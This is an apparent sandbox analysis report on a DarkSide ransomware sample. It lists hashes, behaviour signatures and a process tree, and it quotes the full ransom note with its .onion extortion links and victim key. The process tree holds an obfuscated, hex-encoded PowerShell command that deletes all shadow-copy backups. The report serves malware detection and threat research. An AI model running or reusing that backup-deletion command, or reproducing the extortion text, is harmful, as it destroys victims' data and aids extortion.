Analysis

  • max time kernel
    111s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    12-05-2021 19:34

General

  • Target

    68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe

  • Size

    59KB

  • MD5

    9e779da82d86bcd4cc43ab29f929f73f

  • SHA1

    e6b47869caa776840ab79856b04096152103c71d

  • SHA256

    68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7

  • SHA512

    e0a172b862054b63c26e8852019cbd46b68c6102e4bae802ba851ae950798d336295795c0cc5d68002a0467c62e5800f1ecfdae05de2709d57bcc31375276bb7

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 30GB data. These files include: - Accounting - Finance - Internal documents - Insurance Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/88/EbDyhFDs_z2hYxVR0XHv4S3ZzHUrKh4rqa3bgZ44Og-ORPgEAgMjzoTDuM46leXv On the page you will find examples of files that have been downloaded. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/KB0LXKYKN6E96Z7RFYWCEI6NM03TX93VZCL5EDA4IVPXUIQQZBG2ZEG269ZIFSFM When you open our website, put the following data in the input form: Key: 9mMrqcP7meAPxAvXF25ONPJ4KqIozRuGzFKqvsN4XCuThdVZqteuONtPOu4gYqMXcEcWUx5wELPmbMsI2CcmFySRZJDqPLc8rvxUGJg12wuZki8EizCFaG5L8oQTfgOCvMrTkxmSmVhcSjQt340z9fXWhyQzy96XBkwAzIWp5uviJyAZ9ZBKDlodGa6SDkIFdYVlVQi7R9qzQE4G2KqmQ6Tmim4kCalkH4dBxGYkUC1wCyCncUMAWD7egCaKoKGlHiK99ANxmxFulbvoV8vjn2ArqDm46RNzoMk8C9QGpPsPL0GGppW1izBwguSXug4DrPjvvAmZVJzLrGx0LEH8srhneZnfrSLHm2tDwmOog8obV8IMYF41AuvVX1JyzDkhU282ECvBXDBb7URumIHdSnnVOKCVTKmuC1R3srHwxmd6RweVC1IkvHD7Bt7ybXffJVfRkyhMdpXHLREpoWItO1tlQZxvBUKZlrd7hJGSwZSlR3NWx61XMxuptxrXt7ZOHNJ4AkeJ2FvepgCazbuV57FP38CVC4mHsxyBWCDioj4RmEhA0AMn5Z5 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/blog/article/id/88/EbDyhFDs_z2hYxVR0XHv4S3ZzHUrKh4rqa3bgZ44Og-ORPgEAgMjzoTDuM46leXv

http://darksidfqzcuhtk2.onion/KB0LXKYKN6E96Z7RFYWCEI6NM03TX93VZCL5EDA4IVPXUIQQZBG2ZEG269ZIFSFM

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
    "C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:912
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:644

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    MD5

    6f342e9161e85caac1a2a3d2526a9110

    SHA1

    1be2bd7269c56802c80d82849eff1dde2e987ee8

    SHA256

    7b44a501572f537ac640273808696bdbb6745029e45c00443cdc7fb7e0256745

    SHA512

    d62bd45bc980c1162147e6895502e7c4f65f8ce0e4f39962016e8bad7fb0e3037cb1cd7c1ed54e6252af6c022fbc9c1d51d07d16a5470e263a9cb28e2e0d5bed

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    MD5

    8e8ae682256cfa4045f41c50be73bce3

    SHA1

    114fe5bf02bb429ff3df60e311b29dee1e646c75

    SHA256

    fe8a510581dfb16ccd52432f59b80b8fa67f38a11cc7b4df60c5dd6e5e751c95

    SHA512

    41ee064d2c250e6bdc48174397e2938dab777c7797b3ba4c2d74298f1a52d642236a2ac8c7f45dbf9705a47a3b84fa9e4abd1758e9afedb4517a26d6e7dc6690

  • memory/912-66-0x0000000002070000-0x0000000002071000-memory.dmp

    Filesize

    4KB

  • memory/912-63-0x0000000002030000-0x0000000002031000-memory.dmp

    Filesize

    4KB

  • memory/912-64-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

    Filesize

    4KB

  • memory/912-65-0x0000000002550000-0x0000000002551000-memory.dmp

    Filesize

    4KB

  • memory/912-67-0x000000001AB20000-0x000000001AB22000-memory.dmp

    Filesize

    8KB

  • memory/912-68-0x000000001AB24000-0x000000001AB26000-memory.dmp

    Filesize

    8KB

  • memory/912-69-0x000000001C5F0000-0x000000001C5F1000-memory.dmp

    Filesize

    4KB

  • memory/912-70-0x000000001C410000-0x000000001C411000-memory.dmp

    Filesize

    4KB

  • memory/912-62-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

    Filesize

    8KB

  • memory/912-61-0x0000000000000000-mapping.dmp

  • memory/1872-60-0x0000000075631000-0x0000000075633000-memory.dmp

    Filesize

    8KB